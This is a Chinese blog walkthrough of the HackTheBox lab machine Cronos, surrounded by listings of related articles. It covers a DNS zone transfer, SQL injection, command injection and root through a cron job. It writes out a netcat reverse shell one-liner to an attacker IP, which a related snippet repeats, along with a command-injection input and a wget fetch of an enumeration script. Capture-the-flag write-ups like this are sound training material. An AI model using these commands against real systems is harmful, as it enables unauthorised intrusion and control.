HackTheBox::Cronos

最新推荐文章于 2024-10-06 00:00:00 发布
最新推荐文章于 2024-10-06 00:00:00 发布
阅读量104 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127244073
版权

0x00 信息收集

nmap -Pn -sV -A -T 4 10.10.10.13

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

首先查看80端口的服务

尝试爆破路径,未发现任何可利用的地方
因为开启了53端口的DNS服务,且IP访问的是默认页面,因此将cronos.htb添加到host
vi /etc/hosts


因为扫描端口中有53 DNS服务的端口很可疑,因此考虑dns域传送的问题。

可以得到几个子域名,admin比较感兴趣,同样加到hosts

是一个后台登录,利用方式常见的有爆破和sql注入等
尝试sql注入

顺利进入后台,并且可以看到可以执行系统命令

8.8.8.8& whoami

0x01 漏洞利用

尝试利用命令执行来反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 4444 >/tmp/f


获得交互式shell

python -c ‘import pty;pty.spawn(“/bin/sh”)’

0x02 权限提升

使用sudo -l需要www-data的密码,因此想办法上#传LinEnum.sh
通过wget下载kali中的脚本,通过脚本可以看到crontab定时有许多东西,因此查看一下定时任务

查看php的定时执行

写入php的shell

得到shell

aya3t
关注
专栏目录
hackthebox-cronos(考点:dns/sql注入/crontab)
冬萍子癸水
04-11 376
nmap 看到53端口就应该想到dns,在/etc/hosts/里加上10.10.10.13 cronos.htb 然后再打开80,进入 cronos.htb。看看网页。以及dirbuster扫,但都没什么有价值的信息。 没啥突破口啊。继续信息搜集。 看来针对端口53,还要再利用 dig axfr @10.10.10.13 cronos.htb host -l cronos.htb 10.10...
HackTheBoxCronos笔记
X
04-19 1289
HackTheBoxCronos笔记 HackTheBoxCronos WalkthroughHackTheBoxCronos笔记信息收集NMAP53端口:获得域名80端口:Laravel -> DNS Zone Transfer -> Admin域传送漏洞digNmapnslookup反弹shell提权定时任务反思与总结reference 信息收集 NMAP # nmap...
HackTheBox | Cronos
Purpose_7的博客
03-17 218
HackTheBox | Cornos
HackTheBox - Cronos Write Up
ak.Gh0st的博客
04-03 239
HackTheBox - Cronos Write Up
HackTheBox-Machines--Cronos
七天
05-27 477
Cronos 测试过程。
HackTheBox::Bastard
aya3t的博客
10-10 120
HackTheBox::Optimum
Cronos -- hack the box
neal1991的专栏
03-15 366
IntroductionTarget machine: 10.10.10.13(OS: linux)Kali linux: 10.10.16.44EnumerationF...
Hack the box靶机 cronos
菜浪马废的博客
05-19 408
添加10.10.10.13 cronos.htb 到/etc/hosts 同样添加到/etc/hosts 访问一下 直接绕过了 一看就是远程命令执行 抓包 确认完毕 上nc 10.10.14.8 && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.118 1234 >/tmp/f root用户在运行artisan 写个PHP脚本 替换它 然后连接 我用的php-rever.
Hackthebox:Bastard Walkthrough(not use metasploit)
汗的博客
12-08 380
Hackthebox:Bastard Walkthrough(not use metasploit) 预备知识 dirbuster、nmap、Wappalyzer php 反序列化、Drupal7.x RCE、php-curl certutil、MS15-051 信息收集和获取立足点 nmap 10.10.10.9 结果如下 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 15:16 CST Nmap scan report for 10.10.1
Hackthebox - Previse 靶场实战
路西菲尔的故事汇
08-09 1968
Hackthebox - Previse 靶场实战 靶场信息 靶场类型 信息搜集 使用nmap进行端口扫描 ┌──(root????root)-[~/Desktop] └─# nmap -A -sS -sC -sV -p- 10.10.11.104 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 22:27 CST Nmap scan report for 10.10.11.104 Host is up (0.25s latency). No
网络安全之路:我的系统性渗透测试学习框架
03-19 1672
没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率,可能有错,仅供参考。我会慢慢完善的哦! 写在前面: 1.业界比较好的信息安全网站: freebuff:这个看来你已经找到了 secWiKi:ennnnn 安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有
如何安全地大规模部署 GenAI 应用程序
最新发布
网络研究观
10-06 571
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
CSRF 漏洞 - 学习手册
Blue17 の 小窝
10-05 486
CSRF 漏洞从初识到挖掘全流程笔记合集
前置机、跳板机、堡垒机:安全运维领域的“黄金三角”
拉格朗日的学习笔记
09-28 1066
为了确保数据的安全性、提升系统的可靠性和性能,企业需要采用一系列先进的设备和系统来构建坚固的IT防御体系。其中,前置机、跳板机和堡垒机作为关键组件,各自在网络安全和运维管理中发挥着不可替代的作用。
等保测评:企业数字安全的坚实盾牌
w13359990065的博客
09-30 1857
据权威机构统计,未通过等保测评的企业在遭遇网络安全事件时,其数据泄露风险高出已通过企业近30%,这不仅直接威胁到企业的核心资产安全,还可能导致品牌信誉的严重受损。以某知名电商企业为例,因忽视等保测评,其支付系统曾遭受黑客攻击,导致大量用户信息泄露,最终不仅面临巨额罚款,还失去了大量客户的信任,市场份额一落千丈。以某知名电商企业为例,其在一次等保测评中发现,其支付系统存在一处严重的SQL注入漏洞,该漏洞允许攻击者通过构造特定的输入参数,绕过系统验证,直接访问数据库,进而获取敏感信息。
Web安全 - 构建全面的业务安全保护防御体系
小工匠
10-03 2151
业务安全是公司为了保护其业务流程和用户增长而制定的防护措施,主要应对的是黑产(黑色产业)的攻击。相比传统的基础安全,业务安全的特点更加复杂,主要体现在两个方面:攻击者的产业化和资源对抗。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 1196
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
以太网交换安全:端口安全
fanshizhiren的博客
09-29 1213
端口安全作为一种重要的网络安全技术手段,在保护网络免受未经授权访问和潜在安全威胁方面发挥着关键作用。
Shell定时任务管理:atd与cron详解
本文将主要介绍两种常用的定时任务工具:atd和cron。 首先,atd(Advanced Time and Date Daemon)是一个轻量级的后台任务调度器,主要用于执行一次性的任务。使用at命令,用户可以指定一个时间点(如`at14:00`)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值